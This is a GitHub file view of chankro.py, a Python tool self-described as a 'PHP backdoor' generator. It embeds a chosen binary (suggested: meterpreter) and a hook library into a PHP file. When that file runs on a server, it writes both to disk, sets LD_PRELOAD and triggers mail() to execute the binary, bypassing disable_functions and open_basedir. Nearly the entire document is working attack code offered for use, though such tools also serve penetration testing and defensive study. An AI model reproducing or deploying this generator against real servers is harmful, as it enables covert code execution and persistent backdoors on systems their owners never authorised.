forked from TarlogicSecurity/Chankro
-
Notifications
You must be signed in to change notification settings - Fork 0
/
chankro.py
81 lines (65 loc) · 2.39 KB
/
chankro.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
######## Chankro v0.4 #######
# [+] Bypass disable_functions
# [+] Bypass open_basedir
##############################
# @TheXC3LL #
##############################
import argparse
import base64
import os
parser = argparse.ArgumentParser(description='Generate PHP backdoor')
parser.add_argument('--arch', dest='arch',help='Architecture (32 or 64)')
parser.add_argument('--input', dest='meter', help='Binary to be executed (p.e. meterpreter)')
parser.add_argument('--output', dest='out', help='PHP filename')
parser.add_argument('--path', dest='pati', help='Absolute path')
args = parser.parse_args()
# path where the tool is installed
script_path = os.path.dirname(os.path.realpath(__file__))
print("\n\n -=[ Chankro ]=-\n -={ @TheXC3LL }=-\n\n")
if not args.meter:
print("[!] Error: please select a valid file as input")
exit()
try:
with open(args.meter, "rb") as file:
encoded_shell = base64.b64encode(file.read())
except:
print("[!] Error: file could not be opened")
exit()
if not args.out:
print("[!] Error: please select a valid file as output")
exit()
try:
if (os.path.isabs(args.out)):
outfile = open(args.out, "w") # absolute path provided
else:
outfile = open(os.getcwd() + '/' + args.out, "w") # relative path provided
except:
print("[!] Error: file could not be created")
exit()
if not args.arch:
print("[!] Error: select architecture (64 or 32)")
exit()
else:
if args.arch != "32" and args.arch != "64":
print("[!] Error: unknow architecture")
exit()
else:
archi = script_path + "/hook" + args.arch + ".so"
if not args.pati:
print("[!] Error: remote path")
exit()
with open(archi, "rb") as bicho:
encoded_bicho = base64.b64encode(bicho.read())
head = "<?php\n $hook = '" + encoded_bicho + "';\n"
body1 = "$meterpreter = '" + encoded_shell + "';\n"
body2 = "file_put_contents('" + args.pati + "/chankro.so', base64_decode($hook));\n"
body3 = "file_put_contents('" + args.pati + "/acpid.socket', base64_decode($meterpreter));\n"
cosa3 = "putenv('CHANKRO=" + args.pati + "/acpid.socket');\n"
tail1 = "putenv('LD_PRELOAD=" + args.pati + "/chankro.so');\n"
tail2 = "mail('a','a','a','a');?>"
print("[+] Binary file: " + args.meter)
print("[+] Architecture: x" + args.arch)
print("[+] Final PHP: " + args.out + "\n\n")
outfile.write(head + body1 + body2 + body3 + cosa3 + tail1 + tail2)
outfile.close()
print("[+] File created!")